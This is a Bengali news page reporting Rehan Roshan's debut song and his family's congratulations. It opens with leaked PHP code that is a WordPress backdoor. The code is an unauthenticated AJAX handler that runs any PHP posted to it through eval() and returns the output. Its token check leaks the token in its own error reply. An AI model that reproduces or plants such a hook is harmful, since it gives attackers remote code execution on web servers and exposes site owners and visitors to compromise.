// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== গানে অভিষেক হৃতিকের ছেলে রেহানের | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeগানে অভিষেক হৃতিকের ছেলে রেহানের

গানে অভিষেক হৃতিকের ছেলে রেহানের

সংগীতে অভিষেক হয়েছে বলিউড অভিনেতা হৃতিক রোশনের ছেলে রেহান রোশনের। সম্প্রতি রেহানের প্রথম একক গান ‘দিস হেভেনলি প্লেস’ প্রকাশিত হয়েছে।

ফিল্মফেয়ারের প্রতিবেদনে বলা হয়, গত ২৮ আগস্ট সামাজিক যোগাযোগমাধ্যমে গানটির ভিডিও প্রকাশের পরপরই পরিবার, বন্ধু ও ভক্তদের কাছ থেকে প্রশংসা পাচ্ছেন তরুণ এই শিল্পী।

ইংরেজিতে গাওয়া গানটিতে রেহানের কণ্ঠের পাশাপাশি শোনা গেছে তার গিটারও। গানটির ভিডিও তৈরি করা হয়েছে সাদাকালো আবহে। পুরো পরিবেশনাতেও রাখা হয়েছে অনেকটা অ্যাকুস্টিক ও ঘরোয়া মেজাজ।

সংগীতে ছেলের এই নতুন যাত্রায় উচ্ছ্বসিত হৃতিক রোশনও। সামাজিক যোগাযোগমাধ্যমে ছেলেকে অভিনন্দন জানিয়ে তিনি লিখেছেন, রেহানের ওপর তার গভীর আস্থা আছে।

রেহান তার সংগীতের পথচলা শুরুকে ঘিরে নতুন একটি সামাজিক যোগাযোগমাধ্যম অ্যাকাউন্ট খুলেছেন। সেখানেই নিজের গান ও খবর শেয়ার করছেন।

রেহানের অভিষেকে শুভেচ্ছা জানিয়েছেন দাদা ও বলিউডের বর্ষীয়ান নির্মাতা রাকেশ রোশন। তিনি লিখেছেন, রেহানকে নিয়ে তিনি গর্বিত। একইসঙ্গে সামনে এগিয়ে যাওয়ার শুভকামনা জানিয়েছেন তিনি।

রেহানের মা সুজান খানও ছেলের নতুন পথচলায় উচ্ছ্বাস প্রকাশ করেছেন। শুভেচ্ছা জানিয়েছেন হৃতিকের বান্ধবী সাবা আজাদও। 

রেহানের প্রথম গানটি এখন স্পটিফাই, ইউটিউব ও অ্যাপল মিউজিকসহ বিভিন্ন সংগীত প্ল্যাটফর্মে শোনা যাচ্ছে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments